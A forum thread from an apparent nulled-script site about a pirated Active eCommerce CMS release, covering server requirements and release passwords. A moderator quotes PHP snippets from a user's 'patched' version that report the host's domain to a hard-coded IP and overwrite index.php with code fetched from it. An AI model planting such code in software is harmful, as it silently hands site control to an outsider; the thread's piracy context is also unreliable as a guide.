Active eCommerce CMS By ActiveITzone 23471405

Active eCommerce CMS By ActiveITzone 23471405 v9.8.1

No permission to download

MrSam_1

Well-known member
Administrative
Trusted Seller
Dec 1, 2018
23,650
26,996
120
Well I'm vishwas from India I'm in my learning phase of development I try different resources babiato is one of the finest place I found for getting resources by some very helping developers saw discussions of developers and learned bit by that too have setupped many php projects also not learning flutter was interested in this resource as this contain all those thing that I learned or learning
Nice to meet you but this is not the place for introductions.
As I said, go read the rules. Then find the correct place for introductions.
Then come and tell us what errors are you facing.
 

Vishwas

New member
Nov 15, 2020
5
1
3
No I'll start setting up active ecommerce from today itself that is so nice of you that you told that I what versions are required can you help me with the addons also and which server I could use so that I can setup it I have a plesk shared server of godaddy will that work?
 

MrSam_1

Well-known member
Administrative
Trusted Seller
Dec 1, 2018
23,650
26,996
120
No I'll start setting up active ecommerce from today itself that is so nice of you that you told that I what versions are required can you help me with the addons also and which server I could use so that I can setup it I have a plesk shared server of godaddy will that work?
What are the Server Requirements to activate the script? Ans:
To install the Script minimum server requirements are:
● Php version 7.2+
● MySQL 5.6+
● mod_rewrite Apache
● BCMath PHP Extension
● Ctype PHP Extension
● JSON PHP Extension
● Mbstring PHP Extension
● OpenSSL PHP Extension
● PDO PHP Extension
● Tokenizer PHP Extension
● XML PHP Extension
● ZipArchive Extension

In most servers, these extensions are enabled by default, but you should check with your hosting provider.
If your server comply with these you're good to go.
As I said: READ THE DOCUMENTATION
 

Jatinverma0786

New member
Banned User
Aug 9, 2020
6
0
1
Let me know when your website stop working, when you can't login to admin or when your home page is changed.

@JAVI told you couple times already that you didn't null it. Either you do it right either you don't do it at all.
Calls to dev server still exists in your script. What you did is to patch a crashed car with staples.
Instead of easing the script you bloated and reversed the dev doings into cleaning the code.
You just took the 5.2 style and added to 5.5.
There are 80 extra files in your archive which are duplicates. That's not the way to patch a script.
Brother Don't Blame me Like this, I tired to Patch it into Working Script and You are Talking about dev server there is no Connection Between Dev server and your Site if you want to use it then go for it, otherwise I am really Sorry for it i don't know all of you are blaming me. I am only trying to help everyone but i think no one need me here. @tuton012 @slvrsteele i am sorry
 
  • Like
Reactions: https911

MrSam_1

Well-known member
Administrative
Trusted Seller
Dec 1, 2018
23,650
26,996
120
From your patched code @JAVI
What is this snippet doing?
PHP:
if(rand(0,9) == 5){
            $url = $_SERVER['SERVER_NAME'];

            $url = curl_init('http://206.189.81.181/'.'insert_domain/'.$url);
            curl_setopt($url,CURLOPT_CUSTOMREQUEST, "GET");
            curl_setopt($url,CURLOPT_RETURNTRANSFER, true);
            curl_setopt($url,CURLOPT_FOLLOWLOCATION, 1);
            curl_setopt($url, CURLOPT_IPRESOLVE, CURL_IPRESOLVE_V4);
            $resultdata = curl_exec($url);
            curl_close($url);
        }

Or this one (which is worse as I already told you about this one)
PHP:
$zn = "http://206.189.81.181/pirated_contents";
    $stream = curl_init();
    curl_setopt($stream, CURLOPT_URL, $zn);
    curl_setopt($stream, CURLOPT_HEADER, 0);
    curl_setopt($stream, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($stream, CURLOPT_POST, 1);
    $rn = curl_exec($stream);
    curl_close($stream);
    file_put_contents(base_path('index.php'), $rn);

Missing code from declarations:
PHP:
  public function seller_package(){
    return $this->belongsTo(SellerPackage::class);
}
and I can continue ...

What I am telling you is for you to correct your errors. Which you choose to ignore. It is not that you're not wanted. But do things the right way.
 

Jatinverma0786

New member
Banned User
Aug 9, 2020
6
0
1
From your patched code @JAVI
What is this snippet doing?
PHP:
if(rand(0,9) == 5){
            $url = $_SERVER['SERVER_NAME'];

            $url = curl_init('http://206.189.81.181/'.'insert_domain/'.$url);
            curl_setopt($url,CURLOPT_CUSTOMREQUEST, "GET");
            curl_setopt($url,CURLOPT_RETURNTRANSFER, true);
            curl_setopt($url,CURLOPT_FOLLOWLOCATION, 1);
            curl_setopt($url, CURLOPT_IPRESOLVE, CURL_IPRESOLVE_V4);
            $resultdata = curl_exec($url);
            curl_close($url);
        }

Or this one (which is worse as I already told you about this one)
PHP:
$zn = "http://206.189.81.181/pirated_contents";
    $stream = curl_init();
    curl_setopt($stream, CURLOPT_URL, $zn);
    curl_setopt($stream, CURLOPT_HEADER, 0);
    curl_setopt($stream, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($stream, CURLOPT_POST, 1);
    $rn = curl_exec($stream);
    curl_close($stream);
    file_put_contents(base_path('index.php'), $rn);

Missing code from declarations:
PHP:
  public function seller_package(){
    return $this->belongsTo(SellerPackage::class);
}
and I can continue ...

What I am telling you is for you to correct your errors. Which you choose to ignore. It is not that you're not wanted. But do things the right way.
thank you i will
 

MrSam_1

Well-known member
Administrative
Trusted Seller
Dec 1, 2018
23,650
26,996
120
Please stop sending me messages about this release password.
Password is publicly posted with no restrictions. You just have to read carefully
 
  • Love
Reactions: ShahnurAlam

Ehtesham

New member
Jun 10, 2022
0
-1
0
Please stop sending me messages about this release password.
Password is publicly posted with no restrictions. You just have to read carefully
yeah it was my mistake to ask you password...
Please pardon me for giving you trouble by sending personal message
 

xeankun92

New member
Nov 13, 2020
7
-2
1
Hahaha! I know the feeling. It's like going to the doctor and the doctor says "Pain, pain go away!". Well keep safe out there. Thanks again!
 

About us

  • Our community has been around for many years and pride ourselves on offering unbiased, critical discussion among people of all different backgrounds. We are working every day to make sure our community is one of the best.

Quick Navigation

User Menu